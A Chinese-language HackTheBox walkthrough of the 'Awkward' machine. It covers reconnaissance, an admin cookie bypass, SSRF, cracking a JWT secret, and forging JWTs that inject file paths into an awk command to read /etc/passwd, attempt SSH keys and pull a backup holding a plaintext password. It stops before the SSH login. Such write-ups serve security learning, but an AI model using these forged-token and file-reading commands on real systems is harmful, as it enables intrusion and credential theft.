Hackthebox - Awkward

靶场信息

靶场类型

信息收集

Nmap

┌──(root㉿kali)-[~/Desktop]
└─# nmap -sS -A -sC -sV -p- --min-rate 10000 10.10.11.185
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-11 01:55 CST
Nmap scan report for 10.10.11.185
Host is up (0.083s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 7254afbaf6e2835941b7cd611c2f418b (ECDSA)
|_  256 59365bba3c7821e326b37d23605aec38 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.18.0 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=3/11%OT=22%CT=1%CU=37953%PV=Y%DS=2%DC=T%G=Y%TM=640B6F2
OS:0%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M537ST11NW7%O2=M537ST11NW7%O3=M537NNT11NW7%O4=M537ST11NW7%O5=M537ST1
OS:1NW7%O6=M537ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M537NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT      ADDRESS
1   74.06 ms 10.10.16.1
2   75.37 ms 10.10.11.185

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.82 seconds

Http

这边 web 页面指向域名 hat-valley.htb ,去做一个 hosts 解析

echo 10.10.11.185 hat-valley.htb >> /etc/hosts

似乎是一个什么商城之类的,做找下有没有什么可用信息

Fuzz

┌──(root㉿kali)-[~/Desktop]
└─# ffuf -u "http://hat-valley.htb/FUZZ" -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -t 200  

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.5.0 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://hat-valley.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 200
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

css                     [Status: 301, Size: 173, Words: 7, Lines: 11, Duration: 404ms]
static                  [Status: 301, Size: 179, Words: 7, Lines: 11, Duration: 386ms]
js                      [Status: 301, Size: 171, Words: 7, Lines: 11, Duration: 356ms]
                        [Status: 200, Size: 2881, Words: 305, Lines: 55, Duration: 98ms]
:: Progress: [30000/30000] :: Job [1/1] :: 743 req/sec :: Duration: [0:00:54] :: Errors: 2 ::

跑了一下目录,没什么有用的东西,去跑一下子域名

┌──(root㉿kali)-[~/Desktop]
└─# ffuf -H "Host:FUZZ.hat-valley.htb" -w "/usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt" -u "http://hat-valley.htb/" -t 200 -fs 132

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.5.0 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://hat-valley.htb/
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
 :: Header           : Host: FUZZ.hat-valley.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 200
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response size: 132
________________________________________________

store                   [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 76ms]
:: Progress: [114441/114441] :: Job [1/1] :: 2296 req/sec :: Duration: [0:00:49] :: Errors: 0 ::

发现一个子域名 store ,去加入一下 hosts 解析

echo 10.10.11.185 store.hat-valley.htb >> /etc/hosts

然后去访问一下

提示需要登录,尝试了一下弱口令没有成功,并且 fuzz 了一下也没有可以访问的地址,都是 401

把目光放回到主页面,我们继续 fuzz 下去

┌──(root㉿kali)-[~/Desktop]
└─# ffuf -u "http://hat-valley.htb/js/FUZZ" -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -t 200 -e .js

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.5.0 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://hat-valley.htb/js/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 :: Extensions       : .js 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 200
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

app                     [Status: 200, Size: 150, Words: 6, Lines: 1, Duration: 267ms]
app.js                  [Status: 200, Size: 430202, Words: 15339, Lines: 1640, Duration: 175ms]
custom.js               [Status: 200, Size: 8618, Words: 865, Lines: 370, Duration: 135ms]
custom                  [Status: 200, Size: 153, Words: 6, Lines: 1, Duration: 230ms]
plugin                  [Status: 200, Size: 153, Words: 6, Lines: 1, Duration: 240ms]
plugin.js               [Status: 200, Size: 899759, Words: 60565, Lines: 18950, Duration: 135ms]
                        [Status: 200, Size: 14351, Words: 1661, Lines: 366, Duration: 575ms]
revolution              [Status: 301, Size: 193, Words: 7, Lines: 11, Duration: 286ms]
:: Progress: [60000/60000] :: Job [1/1] :: 564 req/sec :: Duration: [0:01:46] :: Errors: 4 ::

app.js 中找到了一个指向 hr 的地址,去访问一下

有一个登陆页面,但测试了一下弱口令没成功

漏洞利用

寻找突破点

查看 Cookie 中,发现有一个 token 值是 guest,给它改成 admin 试试

就直接登录了

这里有个请假申请,但是点了没有反应?抓个包看看

直接 500 了

在这里发现了两个接口

api/store-status
api/staff-details

分别去访问一下呢

似乎是 JWT 令牌的问题,而 JWT 令牌是必须登录后才有的,但我们现在是通过未授权访问(还是越权?)来进行登录的,所以没有 JWT 令牌。

所以我们现在去退出登录再访问这个页面试试看

我发现我的思路错了,退出登录后还是回有一个 cookie,所以直接删除 cookie 试试

所以我们直接得到了一些账号密码

使用 crack station 来进行破解

https://crackstation.net/

得到了一个账号密码

username = christopher.jones
password = chris123

然后我们去 hr 页面登录

登录成功

然后我们拿到了 JWT Token

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImNocmlzdG9waGVyLmpvbmVzIiwiaWF0IjoxNjc4NTUxNDU3fQ.Baca0KhSUCTjcZiDINY0mVs1Tndg78RGwXWLMpwjuZ8

使用 jwt.io 访问,可以看到内容相当的简单

但是我在四个用户列表中没有看到什么明显的是管理员的东西

不过 Christine Wool 似乎是 CEO,但是 JWT 令牌伪造比较麻烦,而且我看了下靶场类型,偏向于 Custom Exploitation ,这看着很像是兔子洞

所以我们换个思路

来到首页,我们点击刷新,抓这个刷新的包看看

请求的包有点奇怪

这个包指向了子域名 store

ok,这很明显是一个 SSRF 了,我们来 fuzz 一下

Fuzz

┌──(root㉿kali)-[~/Desktop]
└─# ffuf -u 'http://hat-valley.htb/api/store-status?url="http://localhost:FUZZ"' -w /usr/share/seclists/Fuzzing/4-digits-0000-9999.txt -fs 0 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.5.0 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://hat-valley.htb/api/store-status?url="http://localhost:FUZZ"
 :: Wordlist         : FUZZ: /usr/share/seclists/Fuzzing/4-digits-0000-9999.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response size: 0
________________________________________________

0080                    [Status: 200, Size: 132, Words: 6, Lines: 9, Duration: 290ms]
3002                    [Status: 200, Size: 77010, Words: 5916, Lines: 686, Duration: 142ms]
8080                    [Status: 200, Size: 2881, Words: 305, Lines: 55, Duration: 170ms]
:: Progress: [10000/10000] :: Job [1/1] :: 193 req/sec :: Duration: [0:00:49] :: Errors: 0 ::

这里的 3002 和 8080 都是我们没有见过的,比较奇怪的,并且有东西的

而 3002 的 size 居然有 77010 个,明显不对,我们去看一下

直接访问是空白的,我们加上双引号试试

nice,有东西了

发现个有趣的玩意儿,检索已登录用户的休假请求历史记录,这个接口是有 LFI 的。

JWT Token 利用

这里的 awk 命令是传递用户变量的,我们可以通过控制它来达到利用的目的

我们需要将用户变量更改为 /etc/passwd

user 变量的值是 JWT 令牌的用户名,为了让它成功利用,我们先去拿到 JWT Token 的密钥

首先将 token 保存到本地

┌──(root㉿kali)-[~/Desktop]
└─# cat jwt                                                                           
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImNocmlzdG9waGVyLmpvbmVzIiwiaWF0IjoxNjc4NTUxNDU3fQ.Baca0KhSUCTjcZiDINY0mVs1Tndg78RGwXWLMpwjuZ8

然后使用 john 进行破解

┌──(root㉿kali)-[~/Desktop]
└─# john jwt --wordlist=/usr/share/wordlists/rockyou.txt -format=HMAC-SHA256 
Using default input encoding: UTF-8
Loaded 1 password hash (HMAC-SHA256 [password is key, SHA256 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
123beany123      (?)     
1g 0:00:00:03 DONE (2023-03-12 00:54) 0.3076g/s 4102Kp/s 4102Kc/s 4102KC/s 123erix..123P45
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

得到了密钥

然后我们去 jwt.io 进行 cookie 的伪造

得到了 cookie

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Ii8nIC9ldGMvcGFzc3dkICciLCJpYXQiOjE2Nzg1NTE0NTd9.4WKtKGFVSVXt2mD7ZJyxyclmMKFe-lHklgj4QVzBtZk

然后我们用 burp 抓包一个访问 /api/all-leave 的请求,然后把 cookie 替换为我们制作的

成功利用

我这个人比较懒,所以现在我们来构造一下命令行的

curl http://hat-valley.htb/api/all-leave --header "cookie:token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Ii8nIC9ldGMvcGFzc3dkICciLCJpYXQiOjE2Nzg1NTE0NTd9.4WKtKGFVSVXt2mD7ZJyxyclmMKFe-lHklgj4QVzBtZk"
┌──(root㉿kali)-[~/Desktop]
└─# curl http://hat-valley.htb/api/all-leave --header "cookie:token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Ii8nIC9ldGMvcGFzc3dkICciLCJpYXQiOjE2Nzg1NTE0NTd9.4WKtKGFVSVXt2mD7ZJyxyclmMKFe-lHklgj4QVzBtZk"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:102:105::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:103:106:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
syslog:x:104:111::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:112:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:115::/run/uuidd:/usr/sbin/nologin
systemd-oom:x:108:116:systemd Userspace OOM Killer,,,:/run/systemd:/usr/sbin/nologin
tcpdump:x:109:117::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
avahi:x:114:121:Avahi mDNS daemon,,,:/run/avahi-daemon:/usr/sbin/nologin
cups-pk-helper:x:115:122:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
rtkit:x:116:123:RealtimeKit,,,:/proc:/usr/sbin/nologin
whoopsie:x:117:124::/nonexistent:/bin/false
sssd:x:118:125:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
speech-dispatcher:x:119:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
nm-openvpn:x:120:126:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
saned:x:121:128::/var/lib/saned:/usr/sbin/nologin
colord:x:122:129:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:123:130::/var/lib/geoclue:/usr/sbin/nologin
pulse:x:124:131:PulseAudio daemon,,,:/run/pulse:/usr/sbin/nologin
gnome-initial-setup:x:125:65534::/run/gnome-initial-setup/:/bin/false
hplip:x:126:7:HPLIP system user,,,:/run/hplip:/bin/false
gdm:x:127:133:Gnome Display Manager:/var/lib/gdm3:/bin/false
bean:x:1001:1001:,,,:/home/bean:/bin/bash
christine:x:1002:1002:,,,:/home/christine:/bin/bash
postfix:x:128:136::/var/spool/postfix:/usr/sbin/nologin
mysql:x:129:138:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:130:65534::/run/sshd:/usr/sbin/nologin
_laurel:x:999:999::/var/log/laurel:/bin/false

利用成功,现在我们来筛选一下哪些用户可以被我们利用

┌──(root㉿kali)-[~/Desktop]
└─# curl http://hat-valley.htb/api/all-leave --header "cookie:token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Ii8nIC9ldGMvcGFzc3dkICciLCJpYXQiOjE2Nzg1NTE0NTd9.4WKtKGFVSVXt2mD7ZJyxyclmMKFe-lHklgj4QVzBtZk"|grep bash
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  3059  100  3059    0     0  11835      0 --:--:-- --:--:-- --:--:-- 11856
root:x:0:0:root:/root:/bin/bash
bean:x:1001:1001:,,,:/home/bean:/bin/bash
christine:x:1002:1002:,,,:/home/christine:/bin/bash

可以被我们利用的有三个,root、bean、christine,很明显 root 可以排除掉,那我们来尝试请求一下剩下两个的 ssh 密钥试试

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Ii8nIC9ob21lL2JlYW4vLnNzaC9pZF9yc2EgJyIsImlhdCI6MTY3ODU1MTQ1N30.q-l1lOtEZN_v9o2iSq6QtSAa_qy4q820aemxYDMfcKs

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Ii8nIC9ob21lL2NocmlzdGluZS8uc3NoL2lkX3JzYSAnIiwiaWF0IjoxNjc4NTUxNDU3fQ.MUsm1gjZCMxGU1lJ6D0NRn8X_NAaVF2Mf1oZj0het5A

去尝试一下

curl http://hat-valley.htb/api/all-leave --header "cookie:token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Ii8nIC9ob21lL2JlYW4vLnNzaC9pZF9yc2EgJyIsImlhdCI6MTY3ODU1MTQ1N30.q-l1lOtEZN_v9o2iSq6QtSAa_qy4q820aemxYDMfcKs"

curl http://hat-valley.htb/api/all-leave --header "cookie:token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Ii8nIC9ob21lL2NocmlzdGluZS8uc3NoL2lkX3JzYSAnIiwiaWF0IjoxNjc4NTUxNDU3fQ.MUsm1gjZCMxGU1lJ6D0NRn8X_NAaVF2Mf1oZj0het5A"
┌──(root㉿kali)-[~/Desktop]
└─# curl http://hat-valley.htb/api/all-leave --header "cookie:token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Ii8nIC9ob21lL2JlYW4vLnNzaC9pZF9yc2EgJyIsImlhdCI6MTY3ODU1MTQ1N30.q-l1lOtEZN_v9o2iSq6QtSAa_qy4q820aemxYDMfcKs"
Failed to retrieve leave requests                                                                                                                                                                                                                   
┌──(root㉿kali)-[~/Desktop]
└─# curl http://hat-valley.htb/api/all-leave --header "cookie:token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Ii8nIC9ob21lL2NocmlzdGluZS8uc3NoL2lkX3JzYSAnIiwiaWF0IjoxNjc4NTUxNDU3fQ.MUsm1gjZCMxGU1lJ6D0NRn8X_NAaVF2Mf1oZj0het5A"
Failed to retrieve leave requests

都失败了,那我们去获取一下 .bashrc 文件试试

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Ii8nIC9ob21lL2JlYW4vLmJhc2hyYyAnIiwiaWF0IjoxNjc4NTUxNDU3fQ.qM7H1rC2FK75T8PtsA0FfWpP47D5EIoESKpVnx4e-fg

curl http://hat-valley.htb/api/all-leave --header "cookie:token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Ii8nIC9ob21lL2JlYW4vLmJhc2hyYyAnIiwiaWF0IjoxNjc4NTUxNDU3fQ.qM7H1rC2FK75T8PtsA0FfWpP47D5EIoESKpVnx4e-fg"
┌──(root㉿kali)-[~/Desktop]
└─# curl http://hat-valley.htb/api/all-leave --header "cookie:token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Ii8nIC9ob21lL2JlYW4vLmJhc2hyYyAnIiwiaWF0IjoxNjc4NTUxNDU3fQ.qM7H1rC2FK75T8PtsA0FfWpP47D5EIoESKpVnx4e-fg"
# ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples

# If not running interactively, don't do anything
case $- in
    *i*) ;;
      *) return;;
esac

# don't put duplicate lines or lines starting with space in the history.
# See bash(1) for more options
HISTCONTROL=ignoreboth

# append to the history file, don't overwrite it
shopt -s histappend

# for setting history length see HISTSIZE and HISTFILESIZE in bash(1)
HISTSIZE=1000
HISTFILESIZE=2000

# check the window size after each command and, if necessary,
# update the values of LINES and COLUMNS.
shopt -s checkwinsize

# If set, the pattern "**" used in a pathname expansion context will
# match all files and zero or more directories and subdirectories.
#shopt -s globstar

# make less more friendly for non-text input files, see lesspipe(1)
[ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)"

# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "${debian_chroot:-}" ] && [ -r /etc/debian_chroot ]; then
    debian_chroot=$(cat /etc/debian_chroot)
fi

# set a fancy prompt (non-color, unless we know we "want" color)
case "$TERM" in
    xterm-color|*-256color) color_prompt=yes;;
esac

# uncomment for a colored prompt, if the terminal has the capability; turned
# off by default to not distract the user: the focus in a terminal window
# should be on the output of commands, not on the prompt
#force_color_prompt=yes

if [ -n "$force_color_prompt" ]; then
    if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then
        # We have color support; assume it's compliant with Ecma-48
        # (ISO/IEC-6429). (Lack of such support is extremely rare, and such
        # a case would tend to support setf rather than setaf.)
        color_prompt=yes
    else
        color_prompt=
    fi
fi

if [ "$color_prompt" = yes ]; then
    PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '
else
    PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
fi
unset color_prompt force_color_prompt

# If this is an xterm set the title to user@host:dir
case "$TERM" in
xterm*|rxvt*)
    PS1="\[\e]0;${debian_chroot:+($debian_chroot)}\u@\h: \w\a\]$PS1"
    ;;
*)
    ;;
esac

# enable color support of ls and also add handy aliases
if [ -x /usr/bin/dircolors ]; then
    test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
    alias ls='ls --color=auto'
    #alias dir='dir --color=auto'
    #alias vdir='vdir --color=auto'

    alias grep='grep --color=auto'
    alias fgrep='fgrep --color=auto'
    alias egrep='egrep --color=auto'
fi

# colored GCC warnings and errors
#export GCC_COLORS='error=01;31:warning=01;35:note=01;36:caret=01;32:locus=01:quote=01'

# some more ls aliases
alias ll='ls -alF'
alias la='ls -A'
alias l='ls -CF'

# custom
alias backup_home='/bin/bash /home/bean/Documents/backup_home.sh'

# Add an "alert" alias for long running commands.  Use like so:
#   sleep 10; alert
alias alert='notify-send --urgency=low -i "$([ $? = 0 ] && echo terminal || echo error)" "$(history|tail -n1|sed -e '\''s/^\s*[0-9]\+\s*//;s/[;&|]\s*alert$//'\'')"'

# Alias definitions.
# You may want to put all your additions into a separate file like
# ~/.bash_aliases, instead of adding them here directly.
# See /usr/share/doc/bash-doc/examples in the bash-doc package.

if [ -f ~/.bash_aliases ]; then
    . ~/.bash_aliases
fi

# enable programmable completion features (you don't need to enable
# this, if it's already enabled in /etc/bash.bashrc and /etc/profile
# sources /etc/bash.bashrc).
if ! shopt -oq posix; then
  if [ -f /usr/share/bash-completion/bash_completion ]; then
    . /usr/share/bash-completion/bash_completion
  elif [ -f /etc/bash_completion ]; then
    . /etc/bash_completion
  fi
fi
# custom
alias backup_home='/bin/bash /home/bean/Documents/backup_home.sh'

我们找到了一个 alias,还有一个 hash 脚本 /home/bean/Documents/backup_home.sh

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Ii8nIC9ob21lL2JlYW4vRG9jdW1lbnRzL2JhY2t1cF9ob21lLnNoICciLCJpYXQiOjE2Nzg1NTE0NTd9.nlTiW6mox1VXEHkf4fc_dX_pJqqtW8Srm58MNRTeSe0

curl http://hat-valley.htb/api/all-leave --header "cookie:token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Ii8nIC9ob21lL2JlYW4vRG9jdW1lbnRzL2JhY2t1cF9ob21lLnNoICciLCJpYXQiOjE2Nzg1NTE0NTd9.nlTiW6mox1VXEHkf4fc_dX_pJqqtW8Srm58MNRTeSe0"
┌──(root㉿kali)-[~/Desktop]
└─# curl http://hat-valley.htb/api/all-leave --header "cookie:token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Ii8nIC9ob21lL2JlYW4vRG9jdW1lbnRzL2JhY2t1cF9ob21lLnNoICciLCJpYXQiOjE2Nzg1NTE0NTd9.nlTiW6mox1VXEHkf4fc_dX_pJqqtW8Srm58MNRTeSe0"
#!/bin/bash
mkdir /home/bean/Documents/backup_tmp
cd /home/bean
tar --exclude='.npm' --exclude='.cache' --exclude='.vscode' -czvf /home/bean/Documents/backup_tmp/bean_backup.tar.gz .
date > /home/bean/Documents/backup_tmp/time.txt
cd /home/bean/Documents/backup_tmp
tar -czvf /home/bean/Documents/backup/bean_backup_final.tar.gz .
rm -r /home/bean/Documents/backup_tmp

我们去下载这个文件

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Ii8nIC9ob21lL2JlYW4vRG9jdW1lbnRzL2JhY2t1cC9iZWFuX2JhY2t1cF9maW5hbC50YXIuZ3ogJyIsImlhdCI6MTY2NzAxNzE1N30.0Rf75JtUz77mGO61T_NVG7_34fAJ_JckobQUBfbPeUw

curl http://hat-valley.htb/api/all-leave --header "Cookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Ii8nIC9ob21lL2JlYW4vRG9jdW1lbnRzL2JhY2t1cC9iZWFuX2JhY2t1cF9maW5hbC50YXIuZ3ogJyIsImlhdCI6MTY2NzAxNzE1N30.0Rf75JtUz77mGO61T_NVG7_34fAJ_JckobQUBfbPeUw" --output bean_backup_final.zip
┌──(root㉿kali)-[~/Desktop/bean]
└─# curl http://hat-valley.htb/api/all-leave --header "Cookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Ii8nIC9ob21lL2JlYW4vRG9jdW1lbnRzL2JhY2t1cC9iZWFuX2JhY2t1cF9maW5hbC50YXIuZ3ogJyIsImlhdCI6MTY2NzAxNzE1N30.0Rf75JtUz77mGO61T_NVG7_34fAJ_JckobQUBfbPeUw" --output bean_backup_final.zip
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 31716  100 31716    0     0  61542      0 --:--:-- --:--:-- --:--:-- 61584
┌──(root㉿kali)-[~/Desktop/bean]
└─# ls
bean_backup_final.zip
┌──(root㉿kali)-[~/Desktop/bean]
└─# unzip bean_backup_final.zip 
Archive:  bean_backup_final.zip
  End-of-central-directory signature not found.  Either this file is not
  a zipfile, or it constitutes one disk of a multi-part archive.  In the
  latter case the central directory and zipfile comment will be found on
  the last disk(s) of this archive.
unzip:  cannot find zipfile directory in one of bean_backup_final.zip or
        bean_backup_final.zip.zip, and cannot find bean_backup_final.zip.ZIP, period.

将文件解压出来

┌──(root㉿kali)-[~/Desktop/bean]
└─# ls -la
总计 68
drwxr-xr-x  6 root     root      4096  3月12日 01:26 .
drwxr-xr-x  3 root     root      4096  3月12日 01:17 ..
lrwxrwxrwx  1 lucifiel lucifiel     9  9月15日 19:40 .bash_history -> /dev/null
-rw-r--r--  1 lucifiel lucifiel   220  9月15日 19:34 .bash_logout
-rw-r--r--  1 lucifiel lucifiel  3847  9月15日 19:45 .bashrc
-rw-r--r--  1 root     root     31716  3月12日 01:26 bean_backup_final.zip
drwxr-xr-x 12 root     root      4096  3月12日 01:24 .config
drwxr-xr-x  2 root     root      4096  3月12日 01:24 .gnupg
drwxr-xr-x  3 root     root      4096  3月12日 01:24 .local
-rw-r--r--  1 lucifiel lucifiel   807  9月15日 19:34 .profile
drwx------  2 lucifiel lucifiel  4096  9月15日 19:36 .ssh

这是解压出来的文件

┌──(root㉿kali)-[~/Desktop/bean/.config/xpad]
└─# cat content-DS1ZS1 
TO DO:
- Get real hat prices / stock from Christine
- Implement more secure hashing mechanism for HR system
- Setup better confirmation message when adding item to cart
- Add support for item quantity > 1
- Implement checkout system

boldHR SYSTEM/bold
bean.hill
014mrbeanrules!#P

https://www.slac.stanford.edu/slac/www/resource/how-to-use/cgi-rexx/cgi-esc.html

boldMAKE SURE TO USE THIS EVERYWHERE ^^^/bold 

在 bean/.config/xpad/content-DS1ZS1 中找到了 bean 的密码

username = bean.hill
password = 014mrbeanrules!#P

尝试使用 bean 去登录 ssh

